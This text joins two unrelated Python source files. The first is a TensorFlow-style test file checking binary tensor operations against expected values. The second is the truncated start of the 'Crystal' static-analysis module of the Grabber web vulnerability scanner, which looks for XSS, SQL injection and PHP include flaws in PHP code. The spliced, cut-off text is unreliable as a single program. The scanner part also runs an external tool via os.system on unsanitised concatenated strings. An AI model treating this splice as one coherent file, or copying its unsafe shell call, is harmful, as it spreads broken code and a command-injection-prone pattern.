self._testBinary(
gen_math_ops._rsqrt_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array([-160, -81, -28, -4], dtype=dtype))
self._testBinary(
gen_nn_ops._softplus_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array(
[3.97322869, 2.99258232, 1.99817801, 0.99966466], dtype=dtype))
self._testBinary(
gen_math_ops._tanh_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array([-75, -48, -21, 0], dtype=dtype))
self._testBinary(
gen_nn_ops._elu_grad,
np.array([1, 2, 3, 4, 5, 6], dtype=dtype),
np.array([-.6, -.4, -.2, 0, .2, .4], dtype=dtype),
expected=np.array([0.4, 1.2, 2.4, 4, 5, 6], dtype=dtype))
self._testBinary(
gen_nn_ops._selu_grad,
np.array([1, 2, 3, 4, 5, 6], dtype=dtype),
np.array([-.6, -.4, -.2, .2, .4, .6], dtype=dtype),
expected=np.array(
[1.158099340847, 2.7161986816948, 4.67429802254,
4.202803949422, 5.2535049367774, 6.30420592413], dtype=dtype))
self._testBinary(
gen_nn_ops._relu_grad,
np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], dtype=dtype),
np.array([0, 0, 0, 0, 0, 0.1, 0.3, 0.5, 0.7, 0.9], dtype=dtype),
expected=np.array([0, 0, 0, 0, 0, 6, 7, 8, 9, 10], dtype=dtype))
self._testBinary(
gen_nn_ops._relu6_grad,
np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=dtype),
np.array(
[0, 0, 0, 0, 0, 0.1, 0.3, 0.5, 0.7, 0.9, 6.1, 10.0], dtype=dtype),
expected=np.array([0, 0, 0, 0, 0, 6, 7, 8, 9, 10, 0, 0], dtype=dtype))
self._testBinary(
gen_nn_ops._softmax_cross_entropy_with_logits,
np.array([[1, 2, 3, 4], [5, 6, 7, 8]], dtype=dtype),
np.array([[0.1, 0.2, 0.3, 0.4], [0.4, 0.3, 0.2, 0.1]], dtype=dtype),
expected=[
np.array([1.44019, 2.44019], dtype=dtype),
np.array([[-0.067941, -0.112856, -0.063117, 0.243914],
[-0.367941, -0.212856, 0.036883, 0.543914]],
dtype=dtype),
],
equality_test=self.ListsAreClose)
self._testBinary(
gen_nn_ops._sparse_softmax_cross_entropy_with_logits,
np.array([[0.1, 0.2, 0.3, 0.4], [0.5, 0.6, 0.7, 0.8],
[0.9, 1.0, 1.1, 1.2]], dtype=dtype),
np.array([2, 1, 7], dtype=np.int32),
expected=[
np.array([1.342536, 1.442536, np.nan], dtype=dtype),
np.array([[0.213838, 0.236328, -0.738817, 0.288651],
[0.213838, -0.763672, 0.261183, 0.288651],
[np.nan, np.nan, np.nan, np.nan]],
dtype=dtype),
],
equality_test=self.ListsAreClose)
def testIntOps(self):
for dtype in self.int_types:
self._testBinary(
gen_math_ops._truncate_div,
np.array([3, 3, -1, -9, -8], dtype=dtype),
np.array([2, -2, 7, 2, -4], dtype=dtype),
expected=np.array([1, -1, 0, -4, 2], dtype=dtype))
def testNumericOps(self):
for dtype in self.numeric_types:
self._testBinary(
math_ops.add,
np.array([1, 2], dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([11, 22], dtype=dtype))
self._testBinary(
math_ops.add,
dtype(5),
np.array([1, 2], dtype=dtype),
expected=np.array([6, 7], dtype=dtype))
self._testBinary(
math_ops.add,
np.array([[1], [2]], dtype=dtype),
dtype(7),
expected=np.array([[8], [9]], dtype=dtype))
self._testBinary(
math_ops.subtract,
np.array([1, 2], dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([-9, -18], dtype=dtype))
self._testBinary(
math_ops.subtract,
dtype(5),
np.array([1, 2], dtype=dtype),
expected=np.array([4, 3], dtype=dtype))
self._testBinary(
math_ops.subtract,
np.array([[1], [2]], dtype=dtype),
dtype(7),
expected=np.array([[-6], [-5]], dtype=dtype))
self._testBinary(
math_ops.maximum,
np.array([1, 2], dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([10, 20], dtype=dtype))
self._testBinary(
math_ops.maximum,
dtype(5),
np.array([1, 20], dtype=dtype),
expected=np.array([5, 20], dtype=dtype))
self._testBinary(
math_ops.maximum,
np.array([[10], [2]], dtype=dtype),
dtype(7),
expected=np.array([[10], [7]], dtype=dtype))
self._testBinary(
math_ops.minimum,
np.array([1, 20], dtype=dtype),
np.array([10, 2], dtype=dtype),
expected=np.array([1, 2], dtype=dtype))
self._testBinary(
math_ops.minimum,
dtype(5),
np.array([1, 20], dtype=dtype),
expected=np.array([1, 5], dtype=dtype))
self._testBinary(
math_ops.minimum,
np.array([[10], [2]], dtype=dtype),
dtype(7),
expected=np.array([[7], [2]], dtype=dtype))
self._testBinary(
math_ops.multiply,
np.array([1, 20], dtype=dtype),
np.array([10, 2], dtype=dtype),
expected=np.array([10, 40], dtype=dtype))
self._testBinary(
math_ops.multiply,
dtype(5),
np.array([1, 20], dtype=dtype),
expected=np.array([5, 100], dtype=dtype))
self._testBinary(
math_ops.multiply,
np.array([[10], [2]], dtype=dtype),
dtype(7),
expected=np.array([[70], [14]], dtype=dtype))
self._testBinary(
math_ops.squared_difference,
np.array([1, 2], dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([81, 324], dtype=dtype))
self._testBinary(
math_ops.squared_difference,
dtype(5),
np.array([1, 2], dtype=dtype),
expected=np.array([16, 9], dtype=dtype))
self._testBinary(
math_ops.squared_difference,
np.array([[1], [2]], dtype=dtype),
dtype(7),
expected=np.array([[36], [25]], dtype=dtype))
self._testBinary(
nn_ops.bias_add,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([2, -1], dtype=dtype),
expected=np.array([[3, 1], [5, 3]], dtype=dtype))
self._testBinary(
nn_ops.bias_add,
np.array([[[[1, 2], [3, 4]]]], dtype=dtype),
np.array([2, -1], dtype=dtype),
expected=np.array([[[[3, 1], [5, 3]]]], dtype=dtype))
def _testDivision(self, dtype):
"""Test cases for division operators."""
self._testBinary(
math_ops.div,
np.array([10, 20], dtype=dtype),
np.array([10, 2], dtype=dtype),
expected=np.array([1, 10], dtype=dtype))
self._testBinary(
math_ops.div,
dtype(40),
np.array([2, 20], dtype=dtype),
expected=np.array([20, 2], dtype=dtype))
self._testBinary(
math_ops.div,
np.array([[10], [4]], dtype=dtype),
dtype(2),
expected=np.array([[5], [2]], dtype=dtype))
self._testBinary(
gen_math_ops._floor_div,
np.array([3, 3, -1, -9, -8], dtype=dtype),
np.array([2, -2, 7, 2, -4], dtype=dtype),
expected=np.array([1, -2, -1, -5, 2], dtype=dtype))
def testIntDivision(self):
for dtype in self.int_types:
self._testDivision(dtype)
def testFloatDivision(self):
for dtype in self.float_types:
self._testDivision(dtype)
def _testRemainder(self, dtype):
"""Test cases for remainder operators."""
self._testBinary(
gen_math_ops._floor_mod,
np.array([3, 3, -1, -8], dtype=dtype),
np.array([2, -2, 7, -4], dtype=dtype),
expected=np.array([1, -1, 6, 0], dtype=dtype))
self._testBinary(
gen_math_ops._truncate_mod,
np.array([3, 3, -1, -8], dtype=dtype),
np.array([2, -2, 7, -4], dtype=dtype),
expected=np.array([1, 1, -1, 0], dtype=dtype))
def testIntRemainder(self):
for dtype in self.int_types:
self._testRemainder(dtype)
def testFloatRemainder(self):
for dtype in self.float_types:
self._testRemainder(dtype)
def testLogicalOps(self):
self._testBinary(
math_ops.logical_and,
np.array([[True, False], [False, True]], dtype=np.bool),
np.array([[False, True], [False, True]], dtype=np.bool),
expected=np.array([[False, False], [False, True]], dtype=np.bool))
self._testBinary(
math_ops.logical_or,
np.array([[True, False], [False, True]], dtype=np.bool),
np.array([[False, True], [False, True]], dtype=np.bool),
expected=np.array([[True, True], [False, True]], dtype=np.bool))
def testComparisons(self):
self._testBinary(
math_ops.equal,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([False, True, False], dtype=np.bool))
self._testBinary(
math_ops.equal,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([False, True, False], dtype=np.bool))
self._testBinary(
math_ops.equal,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[False], [True], [False]], dtype=np.bool))
self._testBinary(
math_ops.not_equal,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([True, False, True], dtype=np.bool))
self._testBinary(
math_ops.not_equal,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([True, False, True], dtype=np.bool))
self._testBinary(
math_ops.not_equal,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[True], [False], [True]], dtype=np.bool))
for greater_op in [math_ops.greater, (lambda x, y: x > y)]:
self._testBinary(
greater_op,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([False, False, True], dtype=np.bool))
self._testBinary(
greater_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([True, False, False], dtype=np.bool))
self._testBinary(
greater_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[True], [False], [False]], dtype=np.bool))
for greater_equal_op in [math_ops.greater_equal, (lambda x, y: x >= y)]:
self._testBinary(
greater_equal_op,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([False, True, True], dtype=np.bool))
self._testBinary(
greater_equal_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([True, True, False], dtype=np.bool))
self._testBinary(
greater_equal_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[True], [True], [False]], dtype=np.bool))
for less_op in [math_ops.less, (lambda x, y: x < y)]:
self._testBinary(
less_op,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([True, False, False], dtype=np.bool))
self._testBinary(
less_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([False, False, True], dtype=np.bool))
self._testBinary(
less_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[False], [False], [True]], dtype=np.bool))
for less_equal_op in [math_ops.less_equal, (lambda x, y: x <= y)]:
self._testBinary(
less_equal_op,
np.array([1, 5, 20], dtype=np.float32),
np.array([10, 5, 2], dtype=np.float32),
expected=np.array([True, True, False], dtype=np.bool))
self._testBinary(
less_equal_op,
np.float32(5),
np.array([1, 5, 20], dtype=np.float32),
expected=np.array([False, True, True], dtype=np.bool))
self._testBinary(
less_equal_op,
np.array([[10], [7], [2]], dtype=np.float32),
np.float32(7),
expected=np.array([[False], [True], [True]], dtype=np.bool))
def testBroadcasting(self):
"""Tests broadcasting behavior of an operator."""
for dtype in self.numeric_types:
self._testBinary(
math_ops.add,
np.array(3, dtype=dtype),
np.array([10, 20], dtype=dtype),
expected=np.array([13, 23], dtype=dtype))
self._testBinary(
math_ops.add,
np.array([10, 20], dtype=dtype),
np.array(4, dtype=dtype),
expected=np.array([14, 24], dtype=dtype))
# [1,3] x [4,1] => [4,3]
self._testBinary(
math_ops.add,
np.array([[10, 20, 30]], dtype=dtype),
np.array([[1], [2], [3], [4]], dtype=dtype),
expected=np.array(
[[11, 21, 31], [12, 22, 32], [13, 23, 33], [14, 24, 34]],
dtype=dtype))
# [3] * [4,1] => [4,3]
self._testBinary(
math_ops.add,
np.array([10, 20, 30], dtype=dtype),
np.array([[1], [2], [3], [4]], dtype=dtype),
expected=np.array(
[[11, 21, 31], [12, 22, 32], [13, 23, 33], [14, 24, 34]],
dtype=dtype))
def testFill(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.fill,
np.array([], dtype=np.int32),
dtype(-42),
expected=dtype(-42))
self._testBinary(
array_ops.fill,
np.array([1, 2], dtype=np.int32),
dtype(7),
expected=np.array([[7, 7]], dtype=dtype))
self._testBinary(
array_ops.fill,
np.array([3, 2], dtype=np.int32),
dtype(50),
expected=np.array([[50, 50], [50, 50], [50, 50]], dtype=dtype))
# Helper method used by testMatMul, testSparseMatMul, testBatchMatMul below.
def _testMatMul(self, op):
for dtype in self.float_types:
self._testBinary(
op,
np.array([[-0.25]], dtype=dtype),
np.array([[8]], dtype=dtype),
expected=np.array([[-2]], dtype=dtype))
self._testBinary(
op,
np.array([[100, 10, 0.5]], dtype=dtype),
np.array([[1, 3], [2, 5], [6, 8]], dtype=dtype),
expected=np.array([[123, 354]], dtype=dtype))
self._testBinary(
op,
np.array([[1, 3], [2, 5], [6, 8]], dtype=dtype),
np.array([[100], [10]], dtype=dtype),
expected=np.array([[130], [250], [680]], dtype=dtype))
self._testBinary(
op,
np.array([[1000, 100], [10, 1]], dtype=dtype),
np.array([[1, 2], [3, 4]], dtype=dtype),
expected=np.array([[1300, 2400], [13, 24]], dtype=dtype))
self._testBinary(
op,
np.array([], dtype=dtype).reshape((2, 0)),
np.array([], dtype=dtype).reshape((0, 3)),
expected=np.array([[0, 0, 0], [0, 0, 0]], dtype=dtype))
def testMatMul(self):
self._testMatMul(math_ops.matmul)
# TODO(phawkins): failing on GPU, no registered kernel.
def DISABLED_testSparseMatMul(self):
# Binary wrappers for sparse_matmul with different hints
def SparseMatmulWrapperTF(a, b):
return tf.sparse_matmul(a, b, a_is_sparse=True)
def SparseMatmulWrapperFT(a, b):
return tf.sparse_matmul(a, b, b_is_sparse=True)
def SparseMatmulWrapperTT(a, b):
return tf.sparse_matmul(a, b, a_is_sparse=True, b_is_sparse=True)
self._testMatMul(tf.sparse_matmul)
self._testMatMul(SparseMatmulWrapperTF)
self._testMatMul(SparseMatmulWrapperFT)
self._testMatMul(SparseMatmulWrapperTT)
def testBatchMatMul(self):
# Same tests as for tf.matmul above.
self._testMatMul(math_ops.matmul)
# Tests with batches of matrices.
self._testBinary(
math_ops.matmul,
np.array([[[-0.25]]], dtype=np.float32),
np.array([[[8]]], dtype=np.float32),
expected=np.array([[[-2]]], dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array([[[-0.25]], [[4]]], dtype=np.float32),
np.array([[[8]], [[2]]], dtype=np.float32),
expected=np.array([[[-2]], [[8]]], dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array(
[[[[7, 13], [10, 1]], [[2, 0.25], [20, 2]]],
[[[3, 5], [30, 3]], [[0.75, 1], [40, 4]]]],
dtype=np.float32),
np.array(
[[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], [[[11, 22], [33, 44]],
[[55, 66], [77, 88]]]],
dtype=np.float32),
expected=np.array(
[[[[46, 66], [13, 24]], [[11.75, 14], [114, 136]]],
[[[198, 286], [429, 792]], [[118.25, 137.5], [2508, 2992]]]],
dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array([], dtype=np.float32).reshape((2, 2, 0)),
np.array([], dtype=np.float32).reshape((2, 0, 3)),
expected=np.array(
[[[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]]],
dtype=np.float32))
self._testBinary(
math_ops.matmul,
np.array([], dtype=np.float32).reshape((0, 2, 4)),
np.array([], dtype=np.float32).reshape((0, 4, 3)),
expected=np.array([], dtype=np.float32).reshape(0, 2, 3))
# Regression test for b/31472796.
if hasattr(np, "matmul"):
x = np.arange(0, 3 * 5 * 2 * 7, dtype=np.float32).reshape((3, 5, 2, 7))
self._testBinary(
lambda x, y: math_ops.matmul(x, y, adjoint_b=True),
x, x,
expected=np.matmul(x, x.transpose([0, 1, 3, 2])))
def testExpandDims(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.expand_dims,
dtype(7),
np.int32(0),
expected=np.array([7], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([42], dtype=dtype),
np.int32(0),
expected=np.array([[42]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([], dtype=dtype),
np.int32(0),
expected=np.array([[]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(0),
expected=np.array([[[[1, 2], [3, 4]]]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(1),
expected=np.array([[[[1, 2], [3, 4]]]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(2),
expected=np.array([[[[1, 2]], [[3, 4]]]], dtype=dtype))
self._testBinary(
array_ops.expand_dims,
np.array([[[1, 2], [3, 4]]], dtype=dtype),
np.int32(3),
expected=np.array([[[[1], [2]], [[3], [4]]]], dtype=dtype))
def testPad(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.pad,
np.array(
[[1, 2, 3], [4, 5, 6]], dtype=dtype),
np.array(
[[1, 2], [2, 1]], dtype=np.int32),
expected=np.array(
[[0, 0, 0, 0, 0, 0],
[0, 0, 1, 2, 3, 0],
[0, 0, 4, 5, 6, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
dtype=dtype))
def testMirrorPad(self):
mirror_pad = lambda t, paddings: array_ops.pad(t, paddings, "REFLECT")
for dtype in self.numeric_types:
self._testBinary(
mirror_pad,
np.array(
[
[1, 2, 3], #
[4, 5, 6], #
],
dtype=dtype),
np.array([[
1,
1,
], [2, 2]], dtype=np.int32),
expected=np.array(
[
[6, 5, 4, 5, 6, 5, 4], #
[3, 2, 1, 2, 3, 2, 1], #
[6, 5, 4, 5, 6, 5, 4], #
[3, 2, 1, 2, 3, 2, 1]
],
dtype=dtype))
self._testBinary(
mirror_pad,
np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype),
np.array([[0, 0], [0, 0]], dtype=np.int32),
expected=np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype))
self._testBinary(
mirror_pad,
np.array(
[
[1, 2, 3], #
[4, 5, 6], #
[7, 8, 9]
],
dtype=dtype),
np.array([[2, 2], [0, 0]], dtype=np.int32),
expected=np.array(
[
[7, 8, 9], #
[4, 5, 6], #
[1, 2, 3], #
[4, 5, 6], #
[7, 8, 9], #
[4, 5, 6], #
[1, 2, 3]
],
dtype=dtype))
self._testBinary(
mirror_pad,
np.array(
[
[[1, 2, 3], [4, 5, 6]],
[[7, 8, 9], [10, 11, 12]],
], dtype=dtype),
np.array([[0, 0], [1, 1], [1, 1]], dtype=np.int32),
expected=np.array(
[
[
[5, 4, 5, 6, 5], #
[2, 1, 2, 3, 2], #
[5, 4, 5, 6, 5], #
[2, 1, 2, 3, 2], #
],
[
[11, 10, 11, 12, 11], #
[8, 7, 8, 9, 8], #
[11, 10, 11, 12, 11], #
[8, 7, 8, 9, 8], #
]
],
dtype=dtype))
def testReshape(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.reshape,
np.array([], dtype=dtype),
np.array([0, 4], dtype=np.int32),
expected=np.zeros(shape=[0, 4], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([2, 3], dtype=np.int32),
expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([3, 2], dtype=np.int32),
expected=np.array([[0, 1], [2, 3], [4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([-1, 6], dtype=np.int32),
expected=np.array([[0, 1, 2, 3, 4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([6, -1], dtype=np.int32),
expected=np.array([[0], [1], [2], [3], [4], [5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([2, -1], dtype=np.int32),
expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
self._testBinary(
array_ops.reshape,
np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
np.array([-1, 3], dtype=np.int32),
expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
def testSplit(self):
for dtype in self.numeric_types:
self._testBinary(
lambda x, y: array_ops.split(value=y, num_or_size_splits=3, axis=x),
np.int32(0),
np.array([[[1], [2]], [[3], [4]], [[5], [6]]],
dtype=dtype),
expected=[
np.array([[[1], [2]]], dtype=dtype),
np.array([[[3], [4]]], dtype=dtype),
np.array([[[5], [6]]], dtype=dtype),
],
equality_test=self.ListsAreClose)
self._testBinary(
lambda x, y: array_ops.split(value=y, num_or_size_splits=2, axis=x),
np.int32(1),
np.array([[[1], [2]], [[3], [4]], [[5], [6]]],
dtype=dtype),
expected=[
np.array([[[1]], [[3]], [[5]]], dtype=dtype),
np.array([[[2]], [[4]], [[6]]], dtype=dtype),
],
equality_test=self.ListsAreClose)
def testTile(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.tile,
np.array([[6]], dtype=dtype),
np.array([1, 2], dtype=np.int32),
expected=np.array([[6, 6]], dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1], [2]], dtype=dtype),
np.array([1, 2], dtype=np.int32),
expected=np.array([[1, 1], [2, 2]], dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([3, 2], dtype=np.int32),
expected=np.array(
[[1, 2, 1, 2],
[3, 4, 3, 4],
[1, 2, 1, 2],
[3, 4, 3, 4],
[1, 2, 1, 2],
[3, 4, 3, 4]],
dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([1, 1], dtype=np.int32),
expected=np.array(
[[1, 2],
[3, 4]],
dtype=dtype))
self._testBinary(
array_ops.tile,
np.array([[1, 2]], dtype=dtype),
np.array([3, 1], dtype=np.int32),
expected=np.array(
[[1, 2],
[1, 2],
[1, 2]],
dtype=dtype))
def testTranspose(self):
for dtype in self.numeric_types:
self._testBinary(
array_ops.transpose,
np.zeros(shape=[1, 0, 4], dtype=dtype),
np.array([1, 2, 0], dtype=np.int32),
expected=np.zeros(shape=[0, 4, 1], dtype=dtype))
self._testBinary(
array_ops.transpose,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([0, 1], dtype=np.int32),
expected=np.array([[1, 2], [3, 4]], dtype=dtype))
self._testBinary(
array_ops.transpose,
np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([1, 0], dtype=np.int32),
expected=np.array([[1, 3], [2, 4]], dtype=dtype))
def testCross(self):
for dtype in self.float_types:
self._testBinary(
gen_math_ops.cross,
np.zeros((4, 3), dtype=dtype),
np.zeros((4, 3), dtype=dtype),
expected=np.zeros((4, 3), dtype=dtype))
self._testBinary(
gen_math_ops.cross,
np.array([1, 2, 3], dtype=dtype),
np.array([4, 5, 6], dtype=dtype),
expected=np.array([-3, 6, -3], dtype=dtype))
self._testBinary(
gen_math_ops.cross,
np.array([[1, 2, 3], [10, 11, 12]], dtype=dtype),
np.array([[4, 5, 6], [40, 50, 60]], dtype=dtype),
expected=np.array([[-3, 6, -3], [60, -120, 60]], dtype=dtype))
if __name__ == "__main__":
googletest.main()
|
"""
Crystal Module for Grabber v0.1
Copyright (C) 2006 - Romain Gaucher - http://rgaucher.info
"""
import sys,os,re, string, shutil
from xml.sax import * # Need PyXML [http://pyxml.sourceforge.net/]
from grabber import getContent_POST, getContentDirectURL_POST
from grabber import getContent_GET , getContentDirectURL_GET
from grabber import single_urlencode, partially_in, unescape
from grabber import investigate, setDatabase
from spider import flatten, htmlencode, dict_add
from spider import database
vulnToDescritiveNames = {
'xss' : 'Cross-Site Scripting',
'sql' : 'SQL Injection',
'bsql': 'Specific Blind Injection...',
'include' : 'PHP Include Vulnerability'
}
"""
Crystal Module Cooking Book
---------------------------
Make-ahead Tip: Prepare lots of coffee before starting...
Preparation: 24 hours
Ingredients:
A: PHP-Sat
B: Grabber Modules lambda
Tools:
A: Context editor
B: Python 2.4
C: Nice music (Opera is not needed but you should listen this)
Directions:
0) Read the configuration file (with boolean operator in patterns)
1) Scan the PHP sources with PHP-Sat handler (which copy everything in the
'/local/crystal/' directory).
2) Make a kind of diff then:
If the diff results, check for the patterns (given in the configuration file)
Parse the PHP line under the end of the pattern
Try to get a variable value
<after>
If no direct variable... backtrack sequentially or in the AST
</after>
3) Generate the XML report of "the crystal-static-analysis" module
4) Build a database of:
>>> transformed_into_URL(hypothetical flawed files) : {list of "flawed" params}
5) Run the classical tools
"""
crystalFiles = None
crystalUrl = None
crystalExtension = None
crystalAnalyzerBin= None
crystalAnalyzerInputParam = None
crystalAnalyzerOutputParam = None
crystalCheckStart = None
crystalCheckEnd = None
crystalPatterns = {}
crystalRegExpPatterns = {}
crystalStorage = []
crystalDatabase = {}
crystalFinalStorage = {}
def normalize_whitespace(text):
return ' '.join(text.split())
def clear_whitespace(text):
return text.replace(' ','')
class CrystalConfHandler(ContentHandler):
def __init__(self):
self.inAnalyzer = False
self.inPatterns = False
self.inPattern = False
self.isRegExp = False
self.curretVarPos= None
self.currentKeys = []
self.string = ""
def startElement(self, name, attrs):
global crystalAnalyzerInputParam, crystalAnalyzerOutputParam, crystalPatterns, crystalCheckStart, crystalCheckEnd
self.string = ""
self.currentKeys = []
if name == 'analyzer':
self.inAnalyzer = True
elif name == 'path' and self.inAnalyzer:
# store the attributes input and output
if 'input' in attrs.keys() and 'output' in attrs.keys():
crystalAnalyzerInputParam = attrs.getValue('input')
crystalAnalyzerOutputParam = attrs.getValue('output')
else:
raise KeyError("CrystalXMLConf: <path> needs 'input' and 'output' attributes")
elif name == 'patterns' and self.inAnalyzer:
self.inPatterns = True
if 'start' in attrs.keys() and 'end' in attrs.keys():
crystalCheckStart = attrs.getValue('start')
crystalCheckEnd = attrs.getValue('end')
else:
raise KeyError("CrystalXMLConf: <patterns> needs 'start' and 'end' attributes")
if 'name' in attrs.keys():
if attrs.getValue('name').lower() == 'regexp':
self.isRegExp = True
elif self.inPatterns and name == 'pattern':
self.inPattern = True
if 'module' in attrs.keys():
modules = attrs.getValue('module')
modules.replace(' ','')
self.currentKeys = modules.split(',')
if self.isRegExp:
if 'varposition' in attrs.keys():
curretVarPos = attrs.getValue('varposition')
else:
raise KeyError("CrystalXMLConf: <pattern > needs 'varposition' attribute")
def characters(self, ch):
self.string = self.string + ch
def endElement(self, name):
global crystalFiles, crystalUrl, crystalExtension, crystalAnalyzerBin, crystalPatterns, crystalRegExpPatterns
if name == 'files':
crystalFiles = normalize_whitespace(self.string)
elif name == 'url':
crystalUrl = normalize_whitespace(self.string)
elif name == 'extension' and self.inAnalyzer:
crystalExtension = normalize_whitespace(self.string)
elif name == 'path' and self.inAnalyzer:
crystalAnalyzerBin = normalize_whitespace(self.string)
elif not self.isRegExp and name == 'pattern' and self.inPattern:
tempList = self.string.split('__OR__')
for a in self.currentKeys:
if a not in crystalPatterns:
crystalPatterns[a] = []
l = crystalPatterns[a]
for t in tempList:
l.append(normalize_whitespace(t))
elif self.isRegExp and name == 'pattern' and self.inPattern:
"""
tempList = self.string.split('__OR__')
for a in self.currentKeys:
if a not in crystalPatterns:
crystalRegExpPatterns[a] = []
l = crystalRegExpPatterns[a]
# build the compiled regexp
plop = normalize_whitespace(l)
plop = re.compile(plop, re.I)
l.append({currentVarPos : plop})
"""
elif name == "patterns" and self.inPatterns:
self.inPatterns = False
if self.isRegExp:
self.isRegExp = False
elif name == "analyzer" and self.inAnalyzer:
self.inAnalyzer = False
def copySubTree(src, dst, regFilter):
global crystalStorage
names = os.listdir(src)
try:
os.mkdir(dst)
except OSError:
a = 0
try:
os.mkdir(dst.replace('crystal/current', 'crystal/analyzed'))
except OSError:
a = 0
for name in names:
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if os.path.islink(srcname):
linkto = os.readlink(srcname)
os.symlink(linkto, dstname)
elif os.path.isdir(srcname):
copySubTree(srcname, dstname, regFilter)
elif regFilter.match(srcname):
shutil.copy2(srcname, dstname)
crystalStorage.append(dstname)
except (IOError, os.error), why:
continue
def execCmd(program, args):
p = os.popen(program + " " + args)
p.close()
def generateListOfFiles():
"""
Create a ghost in ./local/crystal/current and /local/crystal/analyzed
And run the SwA tool
"""
regScripts = re.compile(r'(.*).' + crystalExtension + '$', re.I)
copySubTree(crystalFiles, 'local/crystal/current', regScripts)
print "Running the static analysis tool..."
for file in crystalStorage:
fileIn = os.path.abspath(os.path.join('./', file))
fileOut = os.path.abspath(os.path.join('./', file.replace('current', 'analyzed')))
cmdLine = crystalAnalyzerInputParam + " " + fileIn + " " + crystalAnalyzerOutputParam + " " + fileOut
# execCmd(crystalAnalyzerBin, cmdLine)
print crystalAnalyzerBin,cmdLine
os.system(crystalAnalyzerBin +" "+ cmdLine)
def stripNoneASCII(output):
# should be somepthing to do that.. :/
newOutput = ""
for s in output:
try:
s = s.encode()
newOutput += s
except UnicodeDecodeError:
continue
return newOutput
def isPatternInFile(fileName):
global crystalDatabase
file = None
try:
file = open(fileName, 'r')
except IOError:
print "Crystal: Cannot open the file [%s]" % fileName
return False
inZone, inLined = False, False
detectPattern = False
lineNumber = 0
shortName = fileName[fileName.rfind('analyzed') + 9 : ]
vulnName = ""
for l in file.readlines():
lineNumber += 1
l = l.replace('\n','')
try:
"""
Check for the regular expression patterns
if len(crystalRegExpPatterns) > 0:
for modules in crystalRegExpPatterns:
for regexp in crystalRegExpPatterns[modules]:
if regexp.match()
"""
if len(vulnName) > 0 and (detectPattern and not inZone or inLined):
# creating the nice structure
# { 'index.php' : {'xss' : {'12', 'echo $_GET["plop"]'}}}
